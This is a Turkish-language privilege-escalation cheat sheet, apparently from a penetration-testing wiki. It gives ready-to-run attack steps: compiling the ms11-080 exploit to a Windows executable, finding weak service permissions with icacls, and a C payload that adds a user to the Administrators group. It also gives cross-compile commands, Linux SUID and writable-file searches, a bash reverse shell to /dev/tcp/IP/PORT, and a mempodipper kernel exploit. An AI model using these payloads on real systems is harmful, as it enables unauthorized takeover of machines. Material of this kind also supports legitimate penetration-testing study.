Zayıf Servisler
Zayıf Servislerden Kaynaklı Hak ve Yetki Yükseltme Saldırıları
ms11-080 exploiti indiridikten sonra .exe formatına dönüştürmek için aşağıdaki kod kullanılmalıdır. Elde edilen exe dosyası hedef makinede çalıştırıldıktan sonra SYSTEM haklarına ulaşmış olur.
# python pyinstaller.py --onefile ms11-080.py
win> move source dest
win> copy source dest
3. parti uygulamaların kurulduklarında beraberinde servisleri de sisteme yüklenir. Yüklenilen 3. parti bir uygulamanın servisine "services.msc" üzerinden ulaşılabilir. Çalışan servisin ".exe" dosyası bulunduktan sonra bu dosyayı çalıştırmaya hak ve yetkisi olan kullanıcıları listelemek için aşağıdaki komut kullanılmalıdır.
win> icacls.exe <exe_name.exe>
Yukarıdaki komut sonucunda ilgili exe üzerinde hak ve yetkileri olan kullanıcılar listenir. Bu kullanıcılar arasında oturum elde edilmiş düşük hak ve yetkideki kullanıcı olmasına dikkat edilir. Ayrıca "Everyone" kullanıcı var ise buna ait yetkilere de bakılmalıdır. Elde edilen çıktıda parantez içerisinde yer alan bazı kısaltmaların açıklamaları aşağıdadır.
F : Full Access D : Delete R : Read W : Write
#include <stdlib.h>
int main(){
int i;
i = system ("net localgroup Administrators lowpriv /add");
return 0;
}
yukarıda yer alan komutu linuxda windows platformuna uygun derlemek için# i586-mingw32msvc-gcc exploit.c -o exploit.exe
veya# i686-w64-mingw32-gcc exploit.c -o exploit.exe
olarak derlenir.Eğer hata alınırsa;i686-w64-mingw32-gcc afd.sys.c -o afdsys.exe -m32 -lws2_32
komutuyla derleme işlemi yapılabilir.
# find / -perm -u=s -type f 2>/dev/null
# find directory -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
# find / -perm -2 ! -type l -ls 2 > /dev/null (List writable file)
#Find SUID
find / -perm -u=s -type f 2>/dev/null
#Find GUID
find / -perm -g=s -type f 2>/dev/null
Bash Reverse Shell
# bash -i >& /dev/tcp/IP/PORT 0>&1
Kernel Exploit
# mempodipper - Linux root exploit >=2.6.39 x64 and x86
# gcc exploit.c -o exploit
Last modified 3yr ago